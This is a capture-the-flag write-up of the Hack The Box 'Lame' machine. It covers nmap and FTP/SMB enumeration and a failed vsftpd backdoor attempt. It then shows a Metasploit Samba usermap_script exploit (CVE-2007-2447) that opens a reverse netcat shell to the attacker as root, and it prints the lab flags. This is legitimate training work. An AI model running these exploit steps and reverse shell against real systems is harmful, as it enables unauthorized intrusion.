HTB: Lame
Lame as its name suggests is a very easy box. The services running on the box are old, and there is a known CVE that allows to directly gain a shell as root.
HTB: Lame
Overview
Lame as its name suggests is a very easy box. The services running on the box are old, and there is a known CVE that allows to directly gain a shell as root.
Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Nmap 7.94SVN scan initiated Tue Jul 23 10:55:09 2024 as: nmap -sSCV -vv -oA nmap/lame 10.10.10.3
Nmap scan report for 10.10.10.3 (10.10.10.3)
Host is up, received echo-reply ttl 63 (0.019s latency).
Scanned at 2024-07-23 10:55:15 +08 for 57s
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.25
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg==
| 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-07-22T22:48:00-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h52m26s, deviation: 2h49m45s, median: -7m36s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59488/tcp): CLEAN (Timeout)
| Check 2 (port 58198/tcp): CLEAN (Timeout)
| Check 3 (port 40169/udp): CLEAN (Timeout)
| Check 4 (port 51269/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 23 10:56:12 2024 -- 1 IP address (1 host up) scanned in 63.16 seconds
From the nmap results, we see that some of the services running on the machine are old. Based on the SSH banner, the machine is likely running on Ubuntu Hardy which dates back to 2008.
FTP (TCP 21)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir -a
229 Entering Extended Passive Mode (|||11407|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
Anonymous FTP is allowed but there are no files available here.
The version of vsftpd installed (2.3.4) has a known backdoor. I’ll use metasploit to perform a quick check.
1
2
3
4
5
6
7
8
9
10
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
The exploit was unsuccessfuly, likely because the backdoor had been manually patched.
SMB (TCP 445)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ smbclient -N -L \\10.10.10.3
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
Anonymous login is allowed and we have several shares available to us. I’ll use smbmap to see which shares I have access to.
1
2
3
4
5
6
7
8
9
10
11
12
13
$ smbmap -u '' -p '' -H 10.10.10.3
...[SNIP]...
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.3:445 Name: 10.10.10.3 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We only have access to the tmp share.
1
2
3
4
5
6
7
8
9
10
11
12
$ smbclient -N \\\\10.10.10.3\\tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 3 19:46:13 2024
.. DR 0 Sat Oct 31 14:33:58 2020
5582.jsvc_up R 0 Sat Aug 3 18:54:32 2024
.ICE-unix DH 0 Sat Aug 3 18:53:31 2024
vmware-root DR 0 Sat Aug 3 18:53:45 2024
.X11-unix DH 0 Sat Aug 3 18:53:57 2024
.X0-lock HR 11 Sat Aug 3 18:53:57 2024
vgauthsvclog.txt.0 R 1600 Sat Aug 3 18:53:29 2024
There is only one file that is not empty and looking into its contents:
vgauthsvclog.txt.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[Jul 22 15:53:25.344] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Jul 22 15:53:25.344] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Jul 22 15:53:25.344] [ message] [VGAuthService] Group 'service'
[Jul 22 15:53:25.344] [ message] [VGAuthService] samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Jul 22 15:53:25.344] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Jul 22 15:53:25.373] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Jul 22 15:53:25.373] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Jul 22 15:53:25.373] [ message] [VGAuthService] Group 'service'
[Jul 22 15:53:25.373] [ message] [VGAuthService] samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Jul 22 15:53:25.373] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Jul 22 15:53:25.373] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
[Jul 22 15:53:25.373] [ message] [VGAuthService] INIT SERVICE
[Jul 22 15:53:25.373] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
[Jul 22 15:53:25.412] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
[Jul 22 15:53:25.430] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
[Jul 22 15:53:25.430] [ message] [VGAuthService] BEGIN SERVICE
This suggests that it is a VMWare log file, and looking up the build number online, there aren’t any known exploits specific to this build. Other publicly available exploits are only applicable to Windows machines, so nothing of interest to us.
CVE-2007-2447
Samba 3.0.20 was released back in 2005, and has a known command execution exploit when using the non-default “username map script” configuration option (CVE-2007-2447)
I’ll use metasploit to perform the exploit and get a shell as root on the box.
1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => 10.10.16.38
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.16.38:4444
[*] Command shell session 1 opened (10.10.16.38:4444 -> 10.10.10.3:54133) at 2024-08-03 19:58:37 +0800
whoami
root
User: 68ce9971ed9e96c85ca94094316a6210
Root: 0b6aeb6957286e33ed21bb3901817e0c
I guess that’s why the box is called Lame…
This post is licensed under CC BY 4.0 by the author.